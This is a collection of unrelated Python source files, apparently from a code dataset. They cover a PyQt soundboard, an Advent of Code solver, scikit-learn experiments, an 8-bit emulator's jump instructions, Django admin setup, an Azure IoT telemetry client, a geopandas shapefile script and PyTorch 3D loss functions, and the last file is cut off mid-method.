                    pb.setIcon(self.iEdit)
                    calcPos = self.BtnW*ligne + colonne + 1
                    pb.setProperty('pbPos', f"nouveau,{calcPos}")
                    pb.clicked.connect(self.add)
                    self.tableWidget.setCellWidget(
                        ligne, colonne, pb)
                # NOTE(review): redundant — the for loops drive these.
                colonne += 1
            ligne += 1
        self.endInitButtons()

    def editTw(self):
        """Open the add form pre-filled with the clicked button's data."""
        pb = self.sender()
        pbPos = pb.property('pbPos')
        # remembered so addValid() replaces the entry instead of adding one
        self.pbPosToModify = pbPos
        self.add()
        for b in self.data_buttons['buttons']:
            if b['position'] == pbPos:
                self.leName.setText(b['name'])
                self.leFile.setText(b['file'])
                self.lePos.setText(str(b['position']))
                self.cdColorPicker.setCurrentColor(
                    QColor(b['r'], b['g'], b['b']))

    def settings(self):
        """Show the grid-size settings form (height/width in buttons)."""
        self.tableWidget.clear()
        self.tableWidget.clearSpans()
        self.tableWidget.setColumnWidth(2, 100)
        self.cdColorPicker.setVisible(False)
        self.tableWidget.setColumnCount(2)
        self.tableWidget.setRowCount(4)
        self.tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
        self.tableWidget.horizontalHeader().hide()
        # validation button
        pb = QPushButton('Valider')
        self.tableWidget.setCellWidget(3, 0, pb)
        pb.clicked.connect(self.saveSettings)
        # cancel button
        pb = QPushButton('Annuler')
        self.tableWidget.setCellWidget(3, 1, pb)
        pb.clicked.connect(self.refreshUI)
        # parameters
        self.tableWidget.setSpan(0, 0, 1, 2)
        self.lAlert = QLabel("La modification de ces valeurs entrainera la "
                             "modification de position des boutons")
        self.lAlert.setStyleSheet("font-weight: bold;")
        self.tableWidget.setCellWidget(
            0, 0, self.lAlert)
        self.tableWidget.setCellWidget(
            1, 0, QLabel('Nombre de boutons en Hauteur'))
        self.leH = QLineEdit(str(self.data_buttons['buttons_grid']['height']))
        self.tableWidget.setCellWidget(
            1, 1, self.leH)
        self.tableWidget.setCellWidget(
            2, 0, QLabel('Nombre de boutons en Largeur'))
        self.leW = QLineEdit(str(self.data_buttons['buttons_grid']['width']))
        self.tableWidget.setCellWidget(
            2, 1, self.leW)
        settingsLayout = QVBoxLayout()
        settingsLayout.setStretch(0, 1)
        settingsLayout.addWidget(self.tableWidget)
        self.windowLayout.addLayout(settingsLayout)
        self.setGeometry(self.left, self.top, 600, 300)

    def saveSettings(self):
        """Persist the new grid size if no existing button falls outside it."""
        h = int(self.leH.text())
        w = int(self.leW.text())
        if h*w < self.max_pos:
            # refuse: the furthest button would be off-grid
            self.lAlert.setText(
                f"Le bouton à la position {str(self.max_pos)} "
                f"est en dehors de la grille {h} x {w}")
            self.lAlert.setStyleSheet(
                "color: rgb(255,0,0); font-weight: bold;")
        else:
            self.data_buttons['buttons_grid']['height'] = int(self.leH.text())
            self.data_buttons['buttons_grid']['width'] = int(self.leW.text())
            with open('buttons.json', 'w', encoding='utf-8') as outfile:
                json.dump(self.data_buttons, outfile, indent=4)
            self.initButtons()

    def refreshUI(self):
        """Rebuild the normal play grid (used as the cancel action)."""
        self.initButtons()

    def browseMedia(self):
        """Open a file dialog and put the chosen file's basename in leFile."""
        self.openFile = QFileDialog.getOpenFileName(
            self, "Sélectionner un média...", "./sons", "Image Files (*.avi *.mp3 *.wav)")
        filenameSplitted = self.openFile[0].split('/')
        self.leFile.setText(filenameSplitted[-1])

    def colorChanged(self):
        """Mirror the color picker's current color into the color field."""
        self.colorSelected = self.cdColorPicker.currentColor()
        self.leColor.setText(str(self.colorSelected.red())+","
                             + str(self.colorSelected.green())+","
                             + str(self.colorSelected.blue()))
if __name__ == "__main__":
    # Start the Qt event loop with a single SoundBoard window.
    app = QApplication(sys.argv)
    mwsb = SoundBoard()
    sys.exit(app.exec_())
|
class Solution:
    """Solver for the 'memory game' (cf. Advent of Code 2020, day 15).

    Each number spoken is remembered along with its most recent turn(s);
    a number spoken for the first time is followed by 0, otherwise by the
    gap between its two most recent turns.
    """

    def solve(self, input, N):
        """Return the number spoken on turn N, given the starting numbers.

        The parameter name ``input`` shadows the builtin; it is kept
        unchanged for interface compatibility.
        """
        # number -> tuple of its most recent turn(s), newest last
        seen = {}
        for turn, value in enumerate(input, start=1):
            seen[value] = (turn,)
        turn = len(input)
        last = input[turn - 1]
        while turn < N:
            turn += 1
            history = seen[last]
            if len(history) == 1:
                # previous number was new -> speak 0
                last = 0
            else:
                # otherwise speak the distance between its last two turns
                last = history[1] - history[0]
            previous = seen.get(last)
            if previous is None:
                seen[last] = (turn,)
            else:
                # keep only the two most recent turns
                seen[last] = (previous[-1], turn)
        return last
if __name__ == '__main__':
    s = Solution()
    input = [20,9,11,0,1,2]
    print(s.solve(input, 2020))
    # NOTE: the 30,000,000-turn run is O(N) in time and memory and takes
    # a noticeable while in pure Python.
    print(s.solve(input, 30000000))
# demo list; its third element gets bumped at import time below
k = [1, 2, 3, 4, 5]


# increment the 3rd element
def increment(list):
    """Add 10 to the element at index 2 of *list* in place, then print it.

    The parameter name shadows the builtin ``list``; it is kept unchanged
    for interface compatibility.
    """
    list[2] = list[2] + 10
    print(list)


increment(k)
|
991,450 | 6d3eb6811ee25bbda22be7945e0c252fef228a86 | # Imports
import pandas as pd
import requests
import re
from bs4 import BeautifulSoup, SoupStrainer
import selenium
from selenium import webdriver
import time
import getpass
import matplotlib.pyplot as plt
import seaborn as sns
#################### Analyze and Plot ####################
# Plot the ELO rating trajectory (skipping the first 40 provisional games).
sns.set_style("white")
sns.set_context('talk')
# NOTE(review): chess_data_total is not defined anywhere in this script —
# presumably produced by a scraping step that was removed; confirm before
# running, otherwise this raises NameError.
plt.plot(chess_data_total['my_elo'][40:])
plt.xlabel('Number of Games', fontsize=18)
plt.ylabel('ELO', fontsize=16)
plt.show()
991,451 | 4140027e7565e537f78a9fee760e751d267092f6 | # -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas import DataFrame,Series
#from sklearn.cross_validation import train_test_split
from sklearn.model_selection import KFold, cross_val_score as CVS, train_test_split as TTS
#from sklearn.linear_model import LinearRegression as LR
#from sklearn.logistic_model import LogisticRegression as LR
from sklearn.linear_model import LogisticRegression as LR
from sklearn.linear_model import RandomizedLogisticRegression as RLR
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
# Read the data file
datafile = u'D:\Machine Learning\9 Homework\Concrete_Data.xls'  # file location; the u prefix guards against non-ASCII characters in the path
data = pd.read_excel(datafile)  # it is an Excel file, hence read_excel; use read_csv for csv files
examDf = DataFrame(data)
examDf.head()
# features = every column but the last; target = last column
exam_X = examDf.iloc[: , :-1].values
exam_Y = examDf.iloc[:,-1].values
# X/Y train-test split; train_size is the fraction of rows used for training
X_train,X_test,Y_train,Y_test = TTS(exam_X,exam_Y,train_size=.3)
#clf = DecisionTreeRegressor(random_state=0)
#rfr = RandomForestRegressor(n_estimators=50,random_state=0)
#clf = clf.fit(X_train,Y_train)
#rfr = rfr.fit(X_train,Y_train)
#score_c = clf.score(X_test,Y_test)
#score_r = rfr.score(X_test,Y_test)
from sklearn.model_selection import cross_val_score
# Sweep n_estimators from 10 to 99 and record the R^2 score on the held-out split
scorel = []
for i in range(10,100):
    rfr = RandomForestRegressor(n_estimators=i,n_jobs=-1,random_state=430)
#    clf = clf.fit(X_train,Y_train)
    rfr = rfr.fit(X_train,Y_train)
#    score_c = clf.score(X_test,Y_test)
    score = rfr.score(X_test,Y_test)
#    score = cross_val_score(rfr,data.data,data.target,cv=10).mean()
    scorel.append(score)
# best score and the n_estimators value that produced it
print(max(scorel),([*range(10,100)][scorel.index(max(scorel))]))
plt.figure(figsize=[20,5])
plt.plot(range(10,100),scorel)
plt.show()
#
##for i in [X_train, X_test]:
## i.index = range(i.shape[0])
##Xtrain.shape
#reg = LR().fit(X_train, Y_train)
#yhat = reg.predict(X_test)
##print (yhat)
#from sklearn.metrics import mean_squared_error as MSE
#mse = MSE(yhat,Y_test)
##exam_Y.max()
##exam_Y.min()
#import sklearn
##sorted(sklearn.metrics.SCORERS.keys())
#cvs = CVS(reg,exam_X,exam_Y,cv=10,scoring="neg_mean_squared_error")
#
#from sklearn.metrics import r2_score
#score_ = r2_score(yhat,Y_test)
#r2 = reg.score(X_test,Y_test)
##r3 = reg.score(yhat,Y_test)
#
#
#
##r1=RLR()
##r1.fit(x,y)
##r1.get_support(indices=True)
##print(dataf.columns[r1.get_support(indices=True)])
##t=dataf[dataf.columns[r1.get_support(indices=True)]].as_matrix()
##r2=LR()
##r2.fit(t,y)
##print("训练结束")
##
##print("模型正确率:"+str(r2.score(t,y)))
#
## -*- coding: utf-8 -*-
#import pandas as pd
#import numpy as np
#import matplotlib.pyplot as plt
#from pandas import DataFrame,Series
##from sklearn.cross_validation import train_test_split
#from sklearn.model_selection import KFold, cross_val_score as CVS, train_test_split as TTS
#from sklearn.linear_model import LinearRegression as LR
#from sklearn.tree import DecisionTreeClassifier
#from sklearn.ensemble import RandomForestClassifier
#from sklearn.datasets import load_wine
#from sklearn.impute import SimpleImputer
##from sklearn.datasets import load_breast_cancer_wisconsin
#wine = load_wine()
#
##读取文件
##datafile = u'D:/Machine Learning/9 Homework/breast-cancer-wisconsin.cvs'#文件所在位置,u为防止路径中有中文名称,此处没有,可以省略
#data = pd.read_csv('D:\\Machine Learning\\9 Homework\\breast-cancer-wisconsin-2.csv') # 正样本数据
#
#data = data.replace(to_replace = "?", value = np.nan)
## then drop the missing value
#data = data.dropna(how = 'any')
#
#exam_X = data.iloc[:, :-1].values
#exam_Y = data.iloc[:,-1].values
#Xtrain, Xtest, Ytrain, Ytest = TTS(exam_X,exam_Y,test_size=0.3)
#clf = DecisionTreeClassifier(random_state=0)
#rfc = RandomForestClassifier(random_state=0)
#clf = clf.fit(Xtrain,Ytrain)
#rfc = rfc.fit(Xtrain,Ytrain)
#score_c = clf.score(Xtest,Ytest)
#score_r = rfc.score(Xtest,Ytest)
|
991,452 | 03f3ebbb9adde4410ffa55623f3ec184a1edfb47 | from nc8.instruction import Instruction
import nc8.conversions
class JumpInstruction(Instruction):
    """Unconditional relative jump: ``jmp <offset>``, base opcode 0xc0,
    4-bit offset argument."""

    def __init__(self):
        super(JumpInstruction, self).__init__('jmp',
                                              base_opcode=0xc0,
                                              argument_range=(0, 0xf),
                                              instruction_format='jmp {0}')

    def parse_arguments(self, arg_value):
        # decode the raw argument nibble into an offset
        return nc8.conversions.convert_offset(arg_value)

    def encode_arg(self, offset_str):
        # encode a textual offset into the raw argument value
        return nc8.conversions.convert_to_offset_value(offset_str)

    def run(self, machine, offset):
        # -1 compensates for the machine's automatic pc advance per step
        machine.regs['pc'] += offset - 1

    def opcode_str(self, offset):
        # disassembled textual form of this instruction
        return 'jmp ' + nc8.conversions.convert_offset_str(offset)
class JumpZeroInstruction(Instruction):
    """Conditional relative jump taken when r0 == 0: ``jz <offset>``,
    base opcode 0xa0, 4-bit offset argument."""

    def __init__(self):
        super(JumpZeroInstruction, self).__init__("jz",
                                                  base_opcode=0xa0,
                                                  argument_range=(0, 0xf),
                                                  instruction_format='jz {0}')

    def encode_arg(self, offset_str):
        # encode a textual offset into the raw argument value
        return nc8.conversions.convert_to_offset_value(offset_str)

    def parse_arguments(self, arg_value):
        # decode the raw argument nibble into an offset
        return nc8.conversions.convert_offset(arg_value)

    def run(self, machine, offset):
        # jump only when r0 is zero; -1 compensates for the auto pc advance
        if machine.regs['r0'] == 0:
            machine.regs['pc'] += offset - 1

    def opcode_str(self, argument):
        # disassembled textual form of this instruction
        return 'jz {offset}'.format(offset=nc8.conversions.convert_offset_str(argument))
class JumpNotZeroInstruction(Instruction):
    """Conditional relative jump taken when r0 != 0: ``jnz <offset>``,
    base opcode 0xb0, 4-bit offset argument."""

    def __init__(self):
        super(JumpNotZeroInstruction, self).__init__("jnz",
                                                     base_opcode=0xb0,
                                                     argument_range=(0, 0xf),
                                                     instruction_format='jnz {0}')

    def encode_arg(self, offset_str):
        # encode a textual offset into the raw argument value
        return nc8.conversions.convert_to_offset_value(offset_str)

    def parse_arguments(self, arg_value):
        # decode the raw argument nibble into an offset
        return nc8.conversions.convert_offset(arg_value)

    def run(self, machine, offset):
        # jump only when r0 is non-zero; -1 compensates for the auto pc advance
        if machine.regs['r0'] != 0:
            machine.regs['pc'] += offset - 1

    def opcode_str(self, argument):
        # disassembled textual form of this instruction
        return 'jnz {offset}'.format(offset=nc8.conversions.convert_offset_str(argument))
991,453 | 5ac9e5b04ff5854301be7ac2fbac597abb62531c | #-*- coding: utf-8 -*-
from copy import deepcopy
from django.contrib import admin
from mezzanine.pages.models import RichTextPage
from mezzanine.pages.admin import PageAdmin
from mezzanine.blog.admin import BlogPostAdmin
from mezzanine.blog.models import BlogPost
from .models import *
# Home page admin: splice extra model fields into a copy of the default
# Mezzanine page fieldsets (insert before the last default field).
HomePage_fieldsets = deepcopy(PageAdmin.fieldsets)
HomePage_fieldsets[0][1]["fields"].insert(-1, "baseline")
HomePage_fieldsets[0][1]["fields"].insert(-1, "sub_title")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_list")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_caption")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_caption_text")
HomePage_fieldsets[0][1]["fields"].insert(-1, "slider_timer")
HomePage_fieldsets[0][1]["fields"].insert(-1, "caption")


class HomeCaptionInline(admin.TabularInline):
    # inline editing of home-page captions
    model = HomeCaption
    extra = 5


class HomeVideoInline(admin.TabularInline):
    # inline editing of home-page videos
    model = HomeVideo
    extra = 5


class HomePageAdmin(PageAdmin):
    fieldsets = HomePage_fieldsets
    inlines = (HomeCaptionInline,HomeVideoInline)


# Section pages: extra presentation fields.
Section_fieldsets = deepcopy(PageAdmin.fieldsets)
Section_fieldsets[0][1]["fields"].insert(-1, "illustration")
Section_fieldsets[0][1]["fields"].insert(-1, "color")
Section_fieldsets[0][1]["fields"].insert(-1, "caption_color")
Section_fieldsets[0][1]["fields"].insert(-1, "text_color")
Section_fieldsets[0][1]["fields"].insert(-1, "sub_title")
Section_fieldsets[0][1]["fields"].insert(-1, "caption")


class SectionAdmin(PageAdmin):
    fieldsets = Section_fieldsets


# Slot pages: extra layout fields.
Slot_fieldsets = deepcopy(PageAdmin.fieldsets)
Slot_fieldsets[0][1]["fields"].insert(-1, "master")
Slot_fieldsets[0][1]["fields"].insert(-1, "illustration")
Slot_fieldsets[0][1]["fields"].insert(-1, "color")
Slot_fieldsets[0][1]["fields"].insert(-1, "text_color")
Slot_fieldsets[0][1]["fields"].insert(-1, "pull_image_left")
Slot_fieldsets[0][1]["fields"].insert(-1, "caption")


class SlotAdmin(PageAdmin):
    fieldsets = Slot_fieldsets


# Team member pages.
Team_fieldsets = deepcopy(PageAdmin.fieldsets)
Team_fieldsets[0][1]["fields"].insert(-1, "prenom")
Team_fieldsets[0][1]["fields"].insert(-1, "fonction")
Team_fieldsets[0][1]["fields"].insert(-1, "email")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_1")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_2")
Team_fieldsets[0][1]["fields"].insert(-1, "illustration_3")


class TeamAdmin(PageAdmin):
    fieldsets = Team_fieldsets


# Network member pages.
Network_fieldsets = deepcopy(PageAdmin.fieldsets)
Network_fieldsets[0][1]["fields"].insert(-1, "prenom")
Network_fieldsets[0][1]["fields"].insert(-1, "poste")
Network_fieldsets[0][1]["fields"].insert(-1, "university")
Network_fieldsets[0][1]["fields"].insert(-1, "ville")
Network_fieldsets[0][1]["fields"].insert(-1, "pays")


class NetworkAdmin(PageAdmin):
    fieldsets = Network_fieldsets


# Sponsor pages.
Sponsor_fieldsets = deepcopy(PageAdmin.fieldsets)
Sponsor_fieldsets[0][1]["fields"].insert(-1, "logo")
Sponsor_fieldsets[0][1]["fields"].insert(-1, "type_sponsor")
Sponsor_fieldsets[0][1]["fields"].insert(-1, "lien")


class SponsorAdmin(PageAdmin):
    fieldsets = Sponsor_fieldsets


# Press pages: press kits plus inline media assets.
Press_fieldsets = deepcopy(PageAdmin.fieldsets)
Press_fieldsets[0][1]["fields"].insert(-1, "caption_color")
Press_fieldsets[0][1]["fields"].insert(-1, "color")
Press_fieldsets[0][1]["fields"].insert(-1, "pressKit_fr")
Press_fieldsets[0][1]["fields"].insert(-1, "pressKit_en")


class MediaAssetInline(admin.TabularInline):
    model = MediaAsset
    extra = 12


class PressFilesAdmin(PageAdmin):
    fieldsets = Press_fieldsets
    inlines = (MediaAssetInline,)


admin.site.register(HomePage, HomePageAdmin)
admin.site.register(Section, SectionAdmin)
admin.site.register(Slot, SlotAdmin)
admin.site.register(Team, TeamAdmin)
admin.site.register(Network, NetworkAdmin)
admin.site.register(Sponsor, SponsorAdmin)
admin.site.register(PressFiles, PressFilesAdmin)

# BLOG ADMIN (model modified through settings)
# Re-register Mezzanine's BlogPost admin with an extra "video" field.
blog_fieldsets = deepcopy(BlogPostAdmin.fieldsets)
blog_fieldsets[0][1]["fields"].insert(-2, "video")


class MyBlogPostAdmin(BlogPostAdmin):
    fieldsets = blog_fieldsets


admin.site.unregister(BlogPost)
admin.site.register(BlogPost, MyBlogPostAdmin)
991,454 | d4c534f889a528f4922048c885c1f2488bcdbe17 |
from xai.brain.wordbase.nouns._loincloth import _LOINCLOTH
# class header
class _LOINCLOTHS(_LOINCLOTH, ):
    """Plural noun entry "LOINCLOTHS"; behavior is inherited from the
    singular entry class _LOINCLOTH."""

    def __init__(self,):
        _LOINCLOTH.__init__(self)
        self.name = "LOINCLOTHS"      # surface form of the word
        self.specie = 'nouns'         # part-of-speech bucket
        self.basic = "loincloth"      # lemma / singular base form
        self.jsondata = {}            # extra metadata, empty for this entry
991,455 | 0cd5a2f55bb009f3baebe3da3b4f32daccc57bb0 | # ==================================================================================
# File: deviceclient.py
# Author: Larry W Jordan Jr (larouex@gmail.com)
# Use: Created and send telemetry to Azure IoT Central with this persisted
# device client
#
# https://github.com/Larouex/cold-hub-azure-iot-central
#
# (c) 2021 Larouex Software Design LLC & Zena is Awesome Software & Zena is Awesome Software
# This code is licensed under MIT license (see LICENSE.txt for details)
# ==================================================================================
import json, sys, time, string, threading, asyncio, os, copy
import logging
# uses the Azure IoT Device SDK for Python (Native Python libraries)
from azure.iot.device.aio import IoTHubDeviceClient
from azure.iot.device import Message
from azure.iot.device import MethodResponse
# our classes
from classes.secrets import Secrets
class DeviceClient():
    """Persisted Azure IoT Central device client.

    Wraps IoTHubDeviceClient: connects with per-device symmetric-key
    credentials loaded from the secrets store and sends JSON telemetry.
    """

    def __init__(self, Log, DeviceName):
        # Logger injected by the caller.
        self.logger = Log

        # Azure Device identity and connection state.
        self.device_name = DeviceName
        self.device_secrets = []
        self.device_client = None

    # -------------------------------------------------------------------------------
    #   Function:   connect
    #   Usage:      The connect function creates the device instance and connects
    # -------------------------------------------------------------------------------
    async def connect(self):
        """Load this device's secrets and open the IoT Hub connection.

        Returns None on failure (details are logged); no return on success.
        """
        try:
            # load the secrets
            secrets = Secrets(self.logger)
            secrets.init()
            self.device_secrets = secrets.get_device_secrets(self.device_name)
            # SECURITY FIX: removed debug prints that dumped the device's
            # symmetric key and hub assignment to stdout.

            self.device_client = IoTHubDeviceClient.create_from_symmetric_key(
                symmetric_key = self.device_secrets["Device"]["Secrets"]["DeviceSymmetricKey"],
                hostname = self.device_secrets["Device"]["Secrets"]["AssignedHub"],
                device_id = self.device_name,
                websockets=True
            )

            await self.device_client.connect()
            self.logger.info("[DEVICE CLIENT] %s" % self.device_client)

        except Exception as ex:
            self.logger.error("[ERROR] %s" % ex)
            self.logger.error("[TERMINATING] We encountered an error creating and connecting the device in the Class::DeviceClient" )
            return None

        return

    # -------------------------------------------------------------------------------
    #   Function:   send_telemetry
    #   Usage:      Loads the Map Telemetry File that Maps Telemtry for Azure
    #               Iot Central to the Node Id's for the Opc Server.
    # -------------------------------------------------------------------------------
    async def send_telemetry(self, Telemetry, InterfacelId, InterfaceInstanceName):
        """Send one JSON telemetry message tagged with its interface id/name.

        NOTE(review): parameter name ``InterfacelId`` (typo) is kept because
        callers may pass it by keyword.
        """
        msg = Message(json.dumps(Telemetry))
        msg.content_encoding = "utf-8"
        msg.content_type = "application/json"
        # IoT Central routes messages by these custom properties.
        msg.custom_properties["$.ifname"] = InterfaceInstanceName
        msg.custom_properties["$.ifid"] = InterfacelId
        await self.device_client.send_message(msg)
        self.logger.info("[MESSAGE] %s" % msg)

    # -------------------------------------------------------------------------------
    #   Function:   disconnect
    #   Usage:      Disconnects from the IoT Hub
    # -------------------------------------------------------------------------------
    async def disconnect(self):
        """Disconnect from the IoT Hub."""
        # BUG FIX: disconnect() is a coroutine; without ``await`` it was
        # never actually executed and the connection stayed open.
        await self.device_client.disconnect()
        return
|
991,456 | 4e7432471668218a7d6c180aef830a7fa70d79b3 | import geopandas as gpd
from shapely.geometry import Polygon
#lat_point_list = [-16.2, -16.2, -19.4, -19.4, -16.2]
#lon_point_list = [ 176.4, 179.1, 179.1, 176.4, 176.4]
#lat_point_list = [ -17.2982, -17.2982, -18.3024, -18.3024, -17.2982 ]
#lon_point_list = [ 177.3083, 178.6267, 178.6267, 177.3083, 177.3083 ]
# Closed rectangle (first point repeated) around the area of interest.
lat_point_list = [ -17.0982, -17.0982, -18.5024, -18.5024, -17.0982 ]
lon_point_list = [ 177.1083, 178.8267, 178.8267, 177.1083, 177.1083 ]

# Shapely wants (x, y) = (lon, lat) order.
polygon_geom = Polygon(zip(lon_point_list, lat_point_list))
# FIX: the {'init': 'epsg:4326'} dict form is deprecated in pyproj/geopandas;
# the authority string selects the same WGS84 CRS without the warning.
crs = 'EPSG:4326'
polygon = gpd.GeoDataFrame(index=[0], crs=crs, geometry=[polygon_geom])
print(polygon.geometry)
#polygon.to_file(filename='polygon.geojson', driver='GeoJSON')
polygon.to_file(filename='fiji-aoi.shp', driver="ESRI Shapefile")
|
991,457 | abdd26a91cded96378c8d8a832a976423e8a1035 | import torch
import torch.nn as nn
import torch.nn.functional as F
import scipy.ndimage as ndimage
class FocalLoss3d_ver1(nn.Module):
    # Weighted L1 loss for 3-D volumes: voxels in a dilated band around the
    # clamped target surface get an extra weight of ``pw``; with ``backzero``
    # set, negative predictions on zero-valued targets are masked out.
    def __init__(self, gamma=2, pw=10, threshold=1.0, erode=3, backzero=0):
        super().__init__()
        self.gamma = gamma          # kept for API parity; unused in forward
        self.pw=pw                  # extra weight inside the dilated band
        self.threshold=threshold    # clamp ceiling used to isolate the band
        self.erode=erode            # half-width of the cubic dilation kernel
        self.backzero=backzero     # nonzero: ignore negative preds on empty targets

    def forward(self, input, target):
        """Weighted mean absolute error between ``input`` and ``target``.

        NOTE(review): the dilation kernel is created on CUDA, so both tensors
        are assumed to live on the GPU and be 5-D (N, C, D, H, W) — confirm.
        """
        # Inspired by the implementation of binary_cross_entropy_with_logits
        weight=torch.clamp(target,min=0,max=self.threshold)
        # Drop voxels that hit the clamp ceiling, keeping only the band below it.
        weight=weight-self.threshold*(weight==self.threshold).to(torch.float)
        kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
        # Dilate the band so neighbouring voxels also receive the extra weight.
        weight=F.conv3d(weight , kernel , padding=self.erode)
        weight=(weight>0).to(torch.float)
        weight=1+weight*self.pw
        if self.backzero != 0 :
            # Zero the weight where the net predicts negative on empty targets.
            mask=((input<0).to(torch.float))*((target==0).to(torch.float))
            mask=(1-mask)
            weight=weight*mask
        if not (target.size() == input.size()):
            raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
        diff=target-input
        loss=torch.abs(diff)*weight
        return loss.mean()
class FocalLoss3d_ver2(nn.Module):
    # L1 loss with optional boundary weighting: when ``is_weight`` is set,
    # voxels near the target's low-value region (dilated twice) are weighted
    # up by ``pw / erode**3``; otherwise this is a plain mean absolute error.
    def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
        super().__init__()
        self.gamma = gamma      # kept for API parity; unused in forward
        self.pw=pw              # extra weight magnitude
        self.erode=erode        # half-width of the second dilation kernel
        self.is_weight=is_weight  # 0 = plain L1, nonzero = weighted L1

    def forward(self, input, target):
        """Mean absolute error, optionally weighted near target boundaries.

        NOTE(review): the weighted branch builds its kernels on CUDA and
        expects 5-D (N, C, D, H, W) tensors — confirm before CPU use.
        """
        # Inspired by the implementation of binary_cross_entropy_with_logits
        if not (target.size() == input.size()):
            raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
        if self.is_weight!=0:
            # Mark near-zero target voxels, then dilate twice to get a band.
            weight_mask=(target<0.1).to(torch.float)
            kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
            weight_mask=F.conv3d(weight_mask, kernel, padding=1)
            weight_mask=((weight_mask)>0).to(torch.float)
            kernel=torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
            weight_mask=F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
            weight_mask = 1 + weight_mask * self.pw/pow(self.erode,3)
            diff=target-input
            loss = torch.abs(diff)*weight_mask
            return loss.mean()
        elif self.is_weight==0:
            # Plain mean absolute error.
            diff=target-input
            loss = torch.abs(diff)
            return loss.mean()
        return None
class DiceLoss(nn.Module):
    """Two-sided Dice loss.

    Computes one Dice term over values above ``+threshold`` and one over
    values below ``-threshold``; each term is added only when the target
    actually has voxels on that side. The threshold doubles as the
    smoothing epsilon in the denominator.
    """

    def __init__(self):
        super().__init__()
        self.threshold=0.01

    def _dice_term(self, pred_mask, true_mask):
        # 1 - 2*|P∩G| / (|P| + |G| + eps), with eps = self.threshold.
        overlap = (pred_mask * true_mask).sum()
        return 1 - 2 * overlap / (pred_mask.sum() + true_mask.sum() + self.threshold)

    def forward(self, input, target):
        loss = 0
        # Positive side.
        pos_pred = (input > self.threshold).to(torch.float)
        pos_true = (target > self.threshold).to(torch.float)
        if pos_true.sum() > 0:
            loss += self._dice_term(pos_pred, pos_true)
        # Negative side.
        neg_pred = (input < -self.threshold).to(torch.float)
        neg_true = (target < -self.threshold).to(torch.float)
        if neg_true.sum() > 0:
            loss += self._dice_term(neg_pred, neg_true)
        return loss
class DiceDis(nn.Module):
    """Weighted combination: ``ratio1 * DiceLoss + FocalLoss3d_ver2``."""

    def __init__(self, ratio1=0, gamma=2, pw=10, erode=2, is_weight=0):
        super().__init__()
        self.l1=DiceLoss()
        self.l2=FocalLoss3d_ver2(gamma,pw,erode,is_weight)
        self.ratio1=ratio1

    def forward(self, input, target):
        dice_part = self.l1(input, target)
        dist_part = self.l2(input, target)
        return self.ratio1 * dice_part + dist_part
class SelfLoss(nn.Module):
    """L1 loss with optional boundary weighting (mirrors FocalLoss3d_ver2).

    BUG FIX: the constructor previously stored only ``coeff`` and discarded
    gamma/pw/erode/is_weight, so every call to forward() raised
    AttributeError on ``self.is_weight``. The parameters are now persisted.
    """

    def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
        super().__init__()
        self.coeff = 0.2          # reserved for the distance-transform idea below
        self.gamma = gamma        # kept for API parity; unused in forward
        self.pw = pw              # extra weight magnitude
        self.erode = erode        # half-width of the second dilation kernel
        self.is_weight = is_weight  # 0 = plain L1, nonzero = weighted L1

    def forward(self, input, target):
        """Mean absolute error, optionally weighted near target boundaries.

        NOTE(review): the weighted branch builds CUDA kernels and expects
        5-D (N, C, D, H, W) tensors — confirm before CPU use.
        """
        if not (target.size() == input.size()):
            raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
        if self.is_weight != 0:
            # Mark near-zero target voxels, then dilate twice to get a band.
            weight_mask = (target < 0.1).to(torch.float)
            kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
            weight_mask = F.conv3d(weight_mask, kernel, padding=1)
            weight_mask = ((weight_mask) > 0).to(torch.float)
            kernel = torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
            weight_mask = F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
            weight_mask = 1 + weight_mask * self.pw / pow(self.erode, 3)
            diff = target - input
            loss = torch.abs(diff) * weight_mask
            return loss.mean()
        # is_weight == 0: plain mean absolute error.
        diff = target - input
        return torch.abs(diff).mean()
class CircularLoss(nn.Module):
    """L1 loss with optional boundary weighting (mirrors FocalLoss3d_ver2).

    BUG FIX: the constructor previously stored only ``coeff`` and discarded
    gamma/pw/erode/is_weight, so every call to forward() raised
    AttributeError on ``self.is_weight``. The parameters are now persisted.
    """

    def __init__(self, gamma=2, pw=10, erode=2, is_weight=0):
        super().__init__()
        self.coeff = 0.2          # reserved for the center-of-mass idea this class was named for
        self.gamma = gamma        # kept for API parity; unused in forward
        self.pw = pw              # extra weight magnitude
        self.erode = erode        # half-width of the second dilation kernel
        self.is_weight = is_weight  # 0 = plain L1, nonzero = weighted L1

    def forward(self, input, target):
        """Mean absolute error, optionally weighted near target boundaries.

        NOTE(review): the weighted branch builds CUDA kernels and expects
        5-D (N, C, D, H, W) tensors — confirm before CPU use.
        """
        if not (target.size() == input.size()):
            raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
        if self.is_weight != 0:
            # Mark near-zero target voxels, then dilate twice to get a band.
            weight_mask = (target < 0.1).to(torch.float)
            kernel = torch.ones(1, 1, 3, 3, 3).to(torch.device("cuda"))
            weight_mask = F.conv3d(weight_mask, kernel, padding=1)
            weight_mask = ((weight_mask) > 0).to(torch.float)
            kernel = torch.ones(1, 1, 2*self.erode+1, 2*self.erode+1, 2*self.erode+1).to(torch.device("cuda"))
            weight_mask = F.conv3d(weight_mask, kernel, padding=self.erode).to(torch.float)
